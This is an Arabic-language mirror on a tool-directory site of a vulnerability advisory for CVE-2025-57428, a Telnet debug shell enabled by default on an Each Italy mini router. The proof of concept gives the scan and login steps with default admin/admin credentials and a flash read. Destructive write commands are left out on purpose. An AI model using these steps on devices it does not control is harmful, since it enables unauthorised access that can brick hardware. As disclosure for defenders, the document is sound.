Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-57428 — CVE-2025-57428 | Kitploit
أدوات/GitHubGitHub/5ulfur/cve-2025-57428
أمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن الأجهزة
GitHub5ulfur/cve-2025-57428

CVE-2025-57428

CVE-2025-57428

عرض المستودع
13منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

⚠️ هذا المستودع يُحتفظ به فقط كمرجع لـ CVE-2025-57428.
للحصول على النشرات والتحديثات الأخرى، يرجى الرجوع إلى: security-advisories.

CVE-2025-57428 - واجهة تصحيح Telnet مفعلة افتراضيًا تتيح الوصول المنخفض المستوى للفلاش/السجلات

المنتج المتأثر

  • البائع/العلامة التجارية: Each Italy
  • الجهاز: Wireless Mini Router WIRELESS-N 300M
  • البرنامج الثابت: v28K.MiniRouter.20190211

الملخص

يعرض هذا الجهاز واجهة تصحيح Telnet (مفعلة افتراضيًا على المنفذ 23) ويقبل بيانات اعتماد المسؤول (`admin`/`admin` افتراضيًا). بعد المصادقة، توفر القشرة وصولًا مباشرًا إلى أوامر منخفضة المستوى (خصوصًا `spi` و `reg`)، مما قد يؤدي إلى تلف عشوائي للبرامج الثابتة، وتعطيل الجهاز، وفقدان الوظائف أو التكوين الأمني.


إثبات المفهوم

ملاحظة: لقد حذفت عمدًا الأوامر التي تقوم بكتابة مدمرة. يُؤكد إثبات المفهوم أدناه وجود الواجهة وإمكانية الوصول إليها دون تقديم استغلال جاهز.

  1. امسح الجهاز على الشبكة المحلية:

    root@kitploit:~
    nmap -p 23 <device-ip>
    

    النتيجة: المنفذ 23 (telnet) يظهر open.

  2. اتصل عبر Telnet وقم بالمصادقة (بيانات الاعتماد الافتراضية):

    root@kitploit:~
    telnet <device-ip>
    # Login as: admin
    # Password: admin
    

    بعد تسجيل الدخول، تظهر موجه تصحيح CMD>.

  3. اسرد الأوامر المتاحة:

    root@kitploit:~
    CMD>help
    

    يظهر مخرج التعليمات القوائم التالية:

    root@kitploit:~
    cfg         net         os
    

    ادخل إلى قائمة os:

    root@kitploit:~
    CMD>os
    

    اسرد الأوامر المتاحة مرة أخرى:

    root@kitploit:~
    OS>help
    

    هذه المرة يظهر مخرج التعليمات الأوامر التالية:

    root@kitploit:~
    thread      mem         spi         reg         cpuload     cpubusy     event
    

    استخدام spi يظهر spi <rd/wr/er> <addr> [len].

  4. اقرأ ذاكرة الفلاش:

    root@kitploit:~
    OS>spi rd 0x000fd0f0 16
    

    يعيد هذا تفريغًا سداسيًا للمنطقة:

    root@kitploit:~
    4f30650a 938f56fa 1b663a19 e316d824
    

    يؤكد هذا أن الأمر يعمل وأن القشرة تمتلك وصولًا منخفض المستوى. أمر الكتابة (spi wr) وأمر المسح (spi er)، بالإضافة إلى أوامر reg، قابلة للتنفيذ أيضًا.

ملاحظات:

  • تغيير كلمة مرور المسؤول عبر الواجهة الإلكترونية يغير أيضًا بيانات اعتماد Telnet، مما يشير إلى مشاركة بيانات الاعتماد.
  • يبقى Telnet مفعلًا افتراضيًا بعد الإعداد الأولي.

التواصل مع البائع

فشلت محاولات العثور على أي جهة اتصال أمنية أو قناة دعم من البائع الأصلي. يبدو أن المنتج عبارة عن جهاز معاد تسميته من مصدر غير معروف.

إخلاء المسؤولية

يتم توفير هذه المعلومات للأغراض التعليمية والدفاعية فقط. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذه المعلومات.

تنزيل الأداة